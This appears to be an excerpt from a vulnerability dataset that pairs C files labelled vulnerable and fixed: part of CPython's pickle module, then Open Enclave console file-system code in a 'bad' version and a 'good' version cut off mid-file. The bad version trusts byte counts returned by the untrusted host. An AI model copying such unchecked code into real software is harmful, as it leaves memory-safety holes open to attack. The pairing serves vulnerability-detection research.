Unpickler_get_persload(UnpicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_load");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Unpickler_set_persload(UnpicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_load must be a callable taking "
"one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyGetSetDef Unpickler_getsets[] = {
{"memo", (getter)Unpickler_get_memo, (setter)Unpickler_set_memo},
{"persistent_load", (getter)Unpickler_get_persload,
(setter)Unpickler_set_persload},
{NULL}
};
static PyTypeObject Unpickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Unpickler", /*tp_name*/
sizeof(UnpicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Unpickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Unpickler___init____doc__, /*tp_doc*/
(traverseproc)Unpickler_traverse, /*tp_traverse*/
(inquiry)Unpickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Unpickler_methods, /*tp_methods*/
0, /*tp_members*/
Unpickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Unpickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/*[clinic input]
_pickle.dump
obj: object
file: object
protocol: object = NULL
*
fix_imports: bool = True
Write a pickled representation of obj to the open file object file.
This is equivalent to ``Pickler(file, protocol).dump(obj)``, but may
be more efficient.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4 and is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dump_impl(PyObject *module, PyObject *obj, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=a4774d5fde7d34de input=93f1408489a87472]*/
{
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (_Pickler_SetOutputStream(pickler, file) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
if (_Pickler_FlushToFile(pickler) < 0)
goto error;
Py_DECREF(pickler);
Py_RETURN_NONE;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.dumps
obj: object
protocol: object = NULL
*
fix_imports: bool = True
Return the pickled representation of the object as a bytes object.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4 and is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
If *fix_imports* is True and *protocol* is less than 3, pickle will
try to map the new Python 3 names to the old module names used in
Python 2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dumps_impl(PyObject *module, PyObject *obj, PyObject *protocol,
int fix_imports)
/*[clinic end generated code: output=d75d5cda456fd261 input=b6efb45a7d19b5ab]*/
{
PyObject *result;
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
result = _Pickler_GetString(pickler);
Py_DECREF(pickler);
return result;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.load
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the pickle data stored in a file.
This is equivalent to ``Unpickler(file).load()``, but may be more
efficient.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_load_impl(PyObject *module, PyObject *file, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=69e298160285199e input=01b44dd3fc07afa7]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetInputStream(unpickler, file) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
/*[clinic input]
_pickle.loads
data: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the given pickle data.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_loads_impl(PyObject *module, PyObject *data, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=1e7cb2343f2c440f input=70605948a719feb9]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetStringInput(unpickler, data) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
static struct PyMethodDef pickle_methods[] = {
_PICKLE_DUMP_METHODDEF
_PICKLE_DUMPS_METHODDEF
_PICKLE_LOAD_METHODDEF
_PICKLE_LOADS_METHODDEF
{NULL, NULL} /* sentinel */
};
static int
pickle_clear(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
return 0;
}
static void
pickle_free(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
}
static int
pickle_traverse(PyObject *m, visitproc visit, void *arg)
{
PickleState *st = _Pickle_GetState(m);
Py_VISIT(st->PickleError);
Py_VISIT(st->PicklingError);
Py_VISIT(st->UnpicklingError);
Py_VISIT(st->dispatch_table);
Py_VISIT(st->extension_registry);
Py_VISIT(st->extension_cache);
Py_VISIT(st->inverted_registry);
Py_VISIT(st->name_mapping_2to3);
Py_VISIT(st->import_mapping_2to3);
Py_VISIT(st->name_mapping_3to2);
Py_VISIT(st->import_mapping_3to2);
Py_VISIT(st->codecs_encode);
Py_VISIT(st->getattr);
return 0;
}
static struct PyModuleDef _picklemodule = {
PyModuleDef_HEAD_INIT,
"_pickle", /* m_name */
pickle_module_doc, /* m_doc */
sizeof(PickleState), /* m_size */
pickle_methods, /* m_methods */
NULL, /* m_reload */
pickle_traverse, /* m_traverse */
pickle_clear, /* m_clear */
(freefunc)pickle_free /* m_free */
};
PyMODINIT_FUNC
PyInit__pickle(void)
{
PyObject *m;
PickleState *st;
m = PyState_FindModule(&_picklemodule);
if (m) {
Py_INCREF(m);
return m;
}
if (PyType_Ready(&Unpickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pdata_Type) < 0)
return NULL;
if (PyType_Ready(&PicklerMemoProxyType) < 0)
return NULL;
if (PyType_Ready(&UnpicklerMemoProxyType) < 0)
return NULL;
/* Create the module and add the functions. */
m = PyModule_Create(&_picklemodule);
if (m == NULL)
return NULL;
Py_INCREF(&Pickler_Type);
if (PyModule_AddObject(m, "Pickler", (PyObject *)&Pickler_Type) < 0)
return NULL;
Py_INCREF(&Unpickler_Type);
if (PyModule_AddObject(m, "Unpickler", (PyObject *)&Unpickler_Type) < 0)
return NULL;
st = _Pickle_GetState(m);
/* Initialize the exceptions. */
st->PickleError = PyErr_NewException("_pickle.PickleError", NULL, NULL);
if (st->PickleError == NULL)
return NULL;
st->PicklingError = \
PyErr_NewException("_pickle.PicklingError", st->PickleError, NULL);
if (st->PicklingError == NULL)
return NULL;
st->UnpicklingError = \
PyErr_NewException("_pickle.UnpicklingError", st->PickleError, NULL);
if (st->UnpicklingError == NULL)
return NULL;
Py_INCREF(st->PickleError);
if (PyModule_AddObject(m, "PickleError", st->PickleError) < 0)
return NULL;
Py_INCREF(st->PicklingError);
if (PyModule_AddObject(m, "PicklingError", st->PicklingError) < 0)
return NULL;
Py_INCREF(st->UnpicklingError);
if (PyModule_AddObject(m, "UnpicklingError", st->UnpicklingError) < 0)
return NULL;
if (_Pickle_InitState(st) < 0)
return NULL;
return m;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_496_0 |
crossvul-cpp_data_bad_4170_4 | // Copyright (c) Open Enclave SDK contributors.
// Licensed under the MIT License.
#include <openenclave/enclave.h>
#include <openenclave/corelibc/stdio.h>
#include <openenclave/corelibc/stdlib.h>
#include <openenclave/corelibc/string.h>
#include <openenclave/internal/print.h>
#include <openenclave/internal/syscall/fcntl.h>
#include <openenclave/internal/syscall/fd.h>
#include <openenclave/internal/syscall/fdtable.h>
#include <openenclave/internal/syscall/iov.h>
#include <openenclave/internal/syscall/raise.h>
#include <openenclave/internal/syscall/sys/ioctl.h>
#include <openenclave/internal/syscall/unistd.h>
#include <openenclave/internal/thread.h>
#include <openenclave/internal/trace.h>
#include "syscall_t.h"
#define MAGIC 0x0b292bab
typedef struct _file
{
oe_fd_t base;
uint32_t magic;
oe_host_fd_t host_fd;
} file_t;
static oe_file_ops_t _get_ops(void);
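/* Added descriptive comment: validate the magic value and downcast the
 * generic descriptor to a consolefs file object; returns NULL if the
 * descriptor is not a consolefs file. */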
static file_t* _cast_file(const oe_fd_t* file_)
{
file_t* file = (file_t*)file_;
if (file == NULL || file->magic != MAGIC)
return NULL;
return file;
}
static int _consolefs_dup(oe_fd_t* file_, oe_fd_t** new_file_out)
{
int ret = -1;
file_t* file = _cast_file(file_);
file_t* new_file = NULL;
if (new_file_out)
*new_file_out = NULL;
if (!file || !new_file_out)
OE_RAISE_ERRNO(OE_EINVAL);
/* Allocate and initialize a new file structure. */
{
if (!(new_file = oe_calloc(1, sizeof(file_t))))
OE_RAISE_ERRNO(OE_ENOMEM);
new_file->base.type = OE_FD_TYPE_FILE;
new_file->base.ops.file = _get_ops();
new_file->magic = MAGIC;
}
/* Ask the host to perform this operation. */
{
oe_host_fd_t retval = -1;
if (oe_syscall_dup_ocall(&retval, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (retval == -1)
OE_RAISE_ERRNO(oe_errno);
new_file->host_fd = retval;
}
*new_file_out = (oe_fd_t*)new_file;
ret = 0;
new_file = NULL;
done:
if (new_file)
oe_free(new_file);
return ret;
}
static int _consolefs_ioctl(oe_fd_t* file_, unsigned long request, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* MUSL uses the TIOCGWINSZ ioctl request to determine whether the file
* descriptor refers to a terminal device (such as stdin, stdout, and
* stderr) so that it can use line-buffered input and output. This check
* fails when delegated to the host since this implementation opens the
* devices by name (/dev/stdin, /dev/stderr, /dev/stdout). So the following
* block works around this problem by implementing TIOCGWINSZ on the
* enclave side. Other terminal control ioctls are left unimplemented.
*/
if (request == OE_TIOCGWINSZ)
{
struct winsize
{
unsigned short int ws_row;
unsigned short int ws_col;
unsigned short int ws_xpixel;
unsigned short int ws_ypixel;
};
struct winsize* p;
if (!(p = (struct winsize*)arg))
OE_RAISE_ERRNO(OE_EINVAL);
p->ws_row = 24;
p->ws_col = 80;
p->ws_xpixel = 0;
p->ws_ypixel = 0;
ret = 0;
goto done;
}
if (oe_syscall_ioctl_ocall(&ret, file->host_fd, request, arg, 0, NULL) !=
OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static int _consolefs_fcntl(oe_fd_t* file_, int cmd, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
void* argout = NULL;
uint64_t argsize = 0;
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
switch (cmd)
{
case OE_F_GETFD:
case OE_F_SETFD:
case OE_F_GETFL:
case OE_F_SETFL:
break;
case OE_F_GETLK:
case OE_F_OFD_GETLK:
argsize = sizeof(struct oe_flock);
argout = (void*)arg;
break;
case OE_F_SETLKW:
case OE_F_SETLK:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
case OE_F_OFD_SETLK:
case OE_F_OFD_SETLKW:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
// for sockets
default:
case OE_F_DUPFD:
case OE_F_SETOWN:
case OE_F_GETOWN:
case OE_F_SETSIG:
case OE_F_GETSIG:
case OE_F_SETOWN_EX:
case OE_F_GETOWN_EX:
case OE_F_GETOWNER_UIDS:
OE_RAISE_ERRNO(OE_EINVAL);
}
if (oe_syscall_fcntl_ocall(
&ret, file->host_fd, cmd, arg, argsize, argout) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_read(oe_fd_t* file_, void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_read_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_write(oe_fd_t* file_, const void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_write_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_readv(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
if (!file || !iov || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/* Call the host. */
if (oe_syscall_readv_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/* Synchronize data read with IO vector. */
if (oe_iov_sync(iov, iovcnt, buf, buf_size) != 0)
OE_RAISE_ERRNO(OE_EINVAL);
done:
if (buf)
oe_free(buf);
return ret;
}
static ssize_t _consolefs_writev(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
if (!file || (!iov && iovcnt) || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/* Call the host. */
if (oe_syscall_writev_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
if (buf)
oe_free(buf);
return ret;
}
static oe_host_fd_t _consolefs_gethostfd(oe_fd_t* file_)
{
oe_host_fd_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
ret = file->host_fd;
done:
return ret;
}
static oe_off_t _consolefs_lseek(oe_fd_t* file_, oe_off_t offset, int whence)
{
oe_off_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(offset);
OE_UNUSED(whence);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pread(
oe_fd_t* file_,
void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pwrite(
oe_fd_t* file_,
const void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static int _consolefs_close(oe_fd_t* file_)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/* Ask the host to perform this operation. */
{
if (oe_syscall_close_ocall(&ret, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (ret == -1)
OE_RAISE_ERRNO(oe_errno);
}
/* Free the file structure. */
oe_free(file);
done:
return ret;
}
static int _consolefs_getdents64(
oe_fd_t* file,
struct oe_dirent* dirp,
uint32_t count)
{
OE_UNUSED(file);
OE_UNUSED(dirp);
OE_UNUSED(count);
/* The standard devices are not directories, so this is unsupported. */
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fstat(oe_fd_t* file, struct oe_stat_t* buf)
{
OE_UNUSED(file);
OE_UNUSED(buf);
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fsync(oe_fd_t* file)
{
OE_UNUSED(file);
OE_RAISE_ERRNO(OE_EINVAL);
done:
return -1;
}
static oe_file_ops_t _ops = {
.fd.read = _consolefs_read,
.fd.write = _consolefs_write,
.fd.readv = _consolefs_readv,
.fd.writev = _consolefs_writev,
.fd.dup = _consolefs_dup,
.fd.ioctl = _consolefs_ioctl,
.fd.fcntl = _consolefs_fcntl,
.fd.close = _consolefs_close,
.fd.get_host_fd = _consolefs_gethostfd,
.lseek = _consolefs_lseek,
.pread = _consolefs_pread,
.pwrite = _consolefs_pwrite,
.getdents64 = _consolefs_getdents64,
.fstat = _consolefs_fstat,
.fsync = _consolefs_fsync,
.fdatasync = _consolefs_fsync,
};
static oe_file_ops_t _get_ops(void)
{
return _ops;
}
static oe_fd_t* _new_file(uint32_t fileno)
{
oe_fd_t* ret = NULL;
file_t* file = NULL;
if (fileno > OE_STDERR_FILENO)
goto done;
/* Create the file struct. */
{
if (!(file = oe_calloc(1, sizeof(file_t))))
goto done;
file->base.type = OE_FD_TYPE_FILE;
file->base.ops.file = _ops;
file->magic = MAGIC;
}
/* Ask the host to duplicate the file descriptor. */
{
oe_host_fd_t retval;
if (oe_syscall_dup_ocall(&retval, fileno) != OE_OK)
goto done;
if (retval < 0)
goto done;
file->host_fd = retval;
}
ret = &file->base;
file = NULL;
done:
if (file)
oe_free(file);
return ret;
}
oe_fd_t* oe_consolefs_create_file(uint32_t fileno)
{
switch (fileno)
{
case OE_STDIN_FILENO:
return _new_file(OE_STDIN_FILENO);
case OE_STDOUT_FILENO:
return _new_file(OE_STDOUT_FILENO);
case OE_STDERR_FILENO:
return _new_file(OE_STDERR_FILENO);
default:
return NULL;
}
}
| ./CrossVul/dataset_final_sorted/CWE-552/c/bad_4170_4 |
crossvul-cpp_data_good_4170_4 | // Copyright (c) Open Enclave SDK contributors.
// Licensed under the MIT License.
#include <openenclave/enclave.h>
#include <openenclave/corelibc/stdio.h>
#include <openenclave/corelibc/stdlib.h>
#include <openenclave/corelibc/string.h>
#include <openenclave/internal/print.h>
#include <openenclave/internal/syscall/fcntl.h>
#include <openenclave/internal/syscall/fd.h>
#include <openenclave/internal/syscall/fdtable.h>
#include <openenclave/internal/syscall/iov.h>
#include <openenclave/internal/syscall/raise.h>
#include <openenclave/internal/syscall/sys/ioctl.h>
#include <openenclave/internal/syscall/unistd.h>
#include <openenclave/internal/thread.h>
#include <openenclave/internal/trace.h>
#include "syscall_t.h"
#define MAGIC 0x0b292bab
typedef struct _file
{
oe_fd_t base;
uint32_t magic;
oe_host_fd_t host_fd;
} file_t;
static oe_file_ops_t _get_ops(void);
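/* Added descriptive comment: validate the magic value and downcast the
 * generic descriptor to a consolefs file object; returns NULL if the
 * descriptor is not a consolefs file. */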
static file_t* _cast_file(const oe_fd_t* file_)
{
file_t* file = (file_t*)file_;
if (file == NULL || file->magic != MAGIC)
return NULL;
return file;
}
static int _consolefs_dup(oe_fd_t* file_, oe_fd_t** new_file_out)
{
int ret = -1;
file_t* file = _cast_file(file_);
file_t* new_file = NULL;
if (new_file_out)
*new_file_out = NULL;
if (!file || !new_file_out)
OE_RAISE_ERRNO(OE_EINVAL);
/* Allocate and initialize a new file structure. */
{
if (!(new_file = oe_calloc(1, sizeof(file_t))))
OE_RAISE_ERRNO(OE_ENOMEM);
new_file->base.type = OE_FD_TYPE_FILE;
new_file->base.ops.file = _get_ops();
new_file->magic = MAGIC;
}
/* Ask the host to perform this operation. */
{
oe_host_fd_t retval = -1;
if (oe_syscall_dup_ocall(&retval, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (retval == -1)
OE_RAISE_ERRNO(oe_errno);
new_file->host_fd = retval;
}
*new_file_out = (oe_fd_t*)new_file;
ret = 0;
new_file = NULL;
done:
if (new_file)
oe_free(new_file);
return ret;
}
static int _consolefs_ioctl(oe_fd_t* file_, unsigned long request, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* MUSL uses the TIOCGWINSZ ioctl request to determine whether the file
* descriptor refers to a terminal device (such as stdin, stdout, and
* stderr) so that it can use line-buffered input and output. This check
* fails when delegated to the host since this implementation opens the
* devices by name (/dev/stdin, /dev/stderr, /dev/stdout). So the following
* block works around this problem by implementing TIOCGWINSZ on the
* enclave side. Other terminal control ioctls are left unimplemented.
*/
if (request == OE_TIOCGWINSZ)
{
struct winsize
{
unsigned short int ws_row;
unsigned short int ws_col;
unsigned short int ws_xpixel;
unsigned short int ws_ypixel;
};
struct winsize* p;
if (!(p = (struct winsize*)arg))
OE_RAISE_ERRNO(OE_EINVAL);
p->ws_row = 24;
p->ws_col = 80;
p->ws_xpixel = 0;
p->ws_ypixel = 0;
ret = 0;
goto done;
}
if (oe_syscall_ioctl_ocall(&ret, file->host_fd, request, arg, 0, NULL) !=
OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static int _consolefs_fcntl(oe_fd_t* file_, int cmd, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
void* argout = NULL;
uint64_t argsize = 0;
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
switch (cmd)
{
case OE_F_GETFD:
case OE_F_SETFD:
case OE_F_GETFL:
case OE_F_SETFL:
break;
case OE_F_GETLK:
case OE_F_OFD_GETLK:
argsize = sizeof(struct oe_flock);
argout = (void*)arg;
break;
case OE_F_SETLKW:
case OE_F_SETLK:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
case OE_F_OFD_SETLK:
case OE_F_OFD_SETLKW:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
// for sockets
default:
case OE_F_DUPFD:
case OE_F_SETOWN:
case OE_F_GETOWN:
case OE_F_SETSIG:
case OE_F_GETSIG:
case OE_F_SETOWN_EX:
case OE_F_GETOWN_EX:
case OE_F_GETOWNER_UIDS:
OE_RAISE_ERRNO(OE_EINVAL);
}
if (oe_syscall_fcntl_ocall(
&ret, file->host_fd, cmd, arg, argsize, argout) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_read(oe_fd_t* file_, void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
/*
* According to the POSIX specification, when the count is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/read.html
* for more detail.
*/
if (!file || count > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_read_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed count.
*/
if (ret > (ssize_t)count)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
return ret;
}
static ssize_t _consolefs_write(oe_fd_t* file_, const void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
/*
* According to the POSIX specification, when the count is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/write.html
* for more detail.
*/
if (!file || count > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_write_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed count.
*/
if (ret > (ssize_t)count)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
return ret;
}
static ssize_t _consolefs_readv(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
size_t data_size = 0;
if (!file || !iov || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size, &data_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/*
* According to the POSIX specification, when the data_size is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/readv.html
* for more detail.
*/
if (data_size > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Call the host. */
if (oe_syscall_readv_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed data_size.
*/
if (ret > (ssize_t)data_size)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
/* Synchronize data read with IO vector. */
if (oe_iov_sync(iov, iovcnt, buf, buf_size) != 0)
OE_RAISE_ERRNO(OE_EINVAL);
done:
if (buf)
oe_free(buf);
return ret;
}
static ssize_t _consolefs_writev(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
size_t data_size = 0;
if (!file || (!iov && iovcnt) || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size, &data_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/*
* According to the POSIX specification, when the data_size is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/writev.html
* for more detail.
*/
if (data_size > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Call the host. */
if (oe_syscall_writev_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed data_size.
*/
if (ret > (ssize_t)data_size)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
if (buf)
oe_free(buf);
return ret;
}
